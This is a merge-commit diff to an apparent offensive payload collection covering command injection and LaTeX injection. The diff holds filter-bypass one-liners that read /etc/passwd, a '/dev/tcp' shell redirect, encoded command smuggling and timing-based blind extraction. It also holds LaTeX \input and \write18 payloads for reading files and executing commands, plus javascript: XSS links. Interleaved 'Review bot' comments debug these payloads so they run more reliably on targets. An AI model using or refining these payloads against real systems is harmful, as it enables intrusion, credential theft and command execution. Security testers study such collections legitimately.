Merge pull request #424 from p0dalirius/master

Added missing descriptions and fixed color formatting for LaTeX
Swissky 2021-09-29 09:39:35 +02:00 committed by GitHub
commit df7172dca1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 45 additions and 38 deletions

View File

@ -71,23 +71,23 @@ Works on Linux only.
swissky@crashlab:~/Www$ cat</etc/passwd swissky@crashlab:~/Www$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd} swissky@crashlab:~$ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ cat$IFS/etc/passwd swissky@crashlab:~$ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd swissky@crashlab:~$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE RCE
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X swissky@crashlab:~$ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu Linux crashlab 4.4.X-XX-generic #72-Ubuntu
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242 swissky@crashlab:~$ sh</dev/tcp/127.0.0.1/4242
``` ```
Commands execution without spaces, $ or { } - Linux (Bash only) Commands execution without spaces, $ or { } - Linux (Bash only)
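Review bot: the hunk header still says "Works on Linux only", but every payload in this block depends on bash rather than on Linux: `{cat,/etc/passwd}` is brace expansion, `X=$'uname\x20-a'` is ANSI-C quoting, and `sh</dev/tcp/127.0.0.1/4242` only works because the outer shell that performs the redirection is bash (`/dev/tcp/host/port` is a bash pseudo-path, not a real device, so with dash as `/bin/sh` the same line fails with "No such file or directory"). Since the next heading already says "(Bash only)", consider labelling this block the same way and noting that the `sh<` line needs bash as the invoking shell. The prompt cleanup from `▸ ~ ▸ $` to `:~$` is fine and makes the lines easier to copy.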
@ -114,28 +114,28 @@ something%0Acat%20/etc/passwd
Linux Linux
```powershell ```powershell
swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd /etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"` swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'` swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -p <<< 2f6574632f706173737764 swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd /etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -p <<< 2f6574632f706173737764` swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764) swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd /etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)` swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
``` ```
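Review bot: the fence is tagged ```powershell while every line in it is bash (the `<(echo ...)` process substitution and `$'\x2f...'` quoting are bash-only); this commit already fixes fence labels in the LaTeX file, so the same change to ```bash belongs here. Worth one extra line: `xxd` is not present on many minimal images (it ships with vim), whereas the `echo -e` and `$'...'` variants above it need nothing beyond bash, so they are the safer first try on an unknown target.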
@ -144,19 +144,19 @@ root:x:0:0:root:/root:/bin/bash
Commands execution without backslash and slash - linux bash Commands execution without backslash and slash - linux bash
```powershell ```powershell
swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1} swissky@crashlab:~$ echo ${HOME:0:1}
/ /
swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1' swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/ /
swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< . swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/ /
swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
``` ```
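Review bot: `tr '!-0' '"-1'` is shown without any explanation of why it yields `/`; a short comment in the block would save readers a trip to the ASCII table, e.g. `# tr maps the range ! .. 0 onto " .. 1, i.e. every byte +1, so . (0x2E) becomes / (0x2F)`. As in the previous block, the fence is tagged ```powershell for bash content and should be ```bash, and the heading "linux bash" would read better as "Linux (Bash)" to match the headings above it.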
@ -221,12 +221,12 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
Extracting data : char by char Extracting data : char by char
```powershell ```powershell
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s real 0m5.007s
user 0m0.000s user 0m0.000s
sys 0m0.000s sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s real 0m0.002s
user 0m0.000s user 0m0.000s
sys 0m0.000s sys 0m0.000s
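Review bot: `[ $(whoami|cut -c 1) == s ]` is bash-only and fragile in a way that matters for blind extraction: `==` inside `[` is a bash extension (POSIX `test` takes a single `=`, and dash rejects `==`), and the unquoted `$(...)` collapses to nothing when the inner command fails, leaving `[ == s ]` and a syntax error instead of a timing signal. Suggest `if [ "$(whoami|cut -c 1)" = s ]; then sleep 5; fi`, which behaves the same in bash and sh, plus a sentence saying that the 5 s `real` time is to be compared against the ~0 s baseline shown on the second run.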

View File

@ -2,14 +2,16 @@
## Read file ## Read file
```bash Read file and interpret the LaTeX code in it:
```tex
\input{/etc/passwd} \input{/etc/passwd}
\include{password} # load .tex file \include{somefile} # load .tex file (somefile.tex)
``` ```
Read single lined file Read single lined file:
```bash ```tex
\newread\file \newread\file
\openin\file=/etc/issue \openin\file=/etc/issue
\read\file to\line \read\file to\line
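Review bot: the new comment on the `\include` line uses `#`, which is not a comment character in TeX: `%` starts a comment and `#` is the macro-parameter character, so pasting `\include{somefile} # load .tex file (somefile.tex)` into a document fails with "You can't use `macro parameter character #' in horizontal mode". Use `% load somefile.tex` instead. Two caveats worth a line each: `\include` appends `.tex`, cannot be used in the preamble and forces a page break and a new `.aux`, so `\input` is the primitive to use for reading arbitrary paths; and `\input{/etc/passwd}` only compiles while the file contains no TeX-special characters (`_`, `#`, `%`, `$`), otherwise the `\verbatiminput` variant further down is the reliable choice.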
@ -17,9 +19,9 @@ Read single lined file
\closein\file \closein\file
``` ```
Read multiple lined file Read multiple lined file:
```bash ```tex
\newread\file \newread\file
\openin\file=/etc/passwd \openin\file=/etc/passwd
\loop\unless\ifeof\file \loop\unless\ifeof\file
@ -29,47 +31,52 @@ Read multiple lined file
\closein\file \closein\file
``` ```
Read text file, keep the formatting Read text file, **without** interpreting the content, it will only paste raw file content:
```bash ```tex
\usepackage{verbatim} \usepackage{verbatim}
\verbatiminput{/etc/passwd} \verbatiminput{/etc/passwd}
``` ```
## Write file ## Write file
```bash Write single lined file:
```tex
\newwrite\outfile \newwrite\outfile
\openout\outfile=cmd.tex \openout\outfile=cmd.tex
\write\outfile{Hello-world} \write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile \closeout\outfile
``` ```
## Command execution ## Command execution
The input of the command will be redirected to stdin, use a temp file to get it. The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
```bash ```tex
\immediate\write18{env > output} \immediate\write18{id > output}
\input{output} \input{output}
``` ```
If you get any LaTex error, consider using base64 to get the result without bad characters If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
```bash ```tex
\immediate\write18{env | base64 > test.tex} \immediate\write18{env | base64 > test.tex}
\input{text.tex} \input{text.tex}
``` ```
```bash ```tex
\input|ls|base4 \input|ls|base64
\input{|"/bin/hostname"} \input{|"/bin/hostname"}
``` ```
## Cross Site Scripting ## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
```tex
\url{javascript:alert(1)} \url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder} \href{javascript:alert(1)}{placeholder}
``` ```
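Review bot: the base64 example still has a filename mismatch that this commit does not fix: `\immediate\write18{env | base64 > test.tex}` writes `test.tex` but the next line reads `\input{text.tex}`, so the payload as written errors with "File `text.tex' not found"; either spelling works, they just have to match. The "Command execution" section should also state its precondition: `\write18` and the `\input{|"..."}` pipe form only execute when the compiler is invoked with `--shell-escape` (`-enable-write18` on MiKTeX); in the default restricted mode only the programs allow-listed in `shell_escape_commands` in `texmf.cnf` run, so an empty result usually means restricted mode rather than a broken payload. Minor: the heading now reads "Write single lined file:" but the block writes three lines (`Hello-world`, `Line 2`, `I like trains`); either drop "single lined" or drop the two added `\write` lines.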
@ -80,4 +87,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)